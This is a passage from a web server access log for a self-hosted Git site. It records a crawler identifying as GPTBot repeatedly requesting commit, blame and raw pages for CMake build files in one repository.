9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:52:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:52:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:52:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:16:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:16:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10645] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10657] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10644] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10657] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10303] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14319] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14319] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14321] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14320] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10303] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10303] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11351] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14600] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10005] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14601] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:52:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:52:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11353] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10263] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11351] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:16:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9986] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14600] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 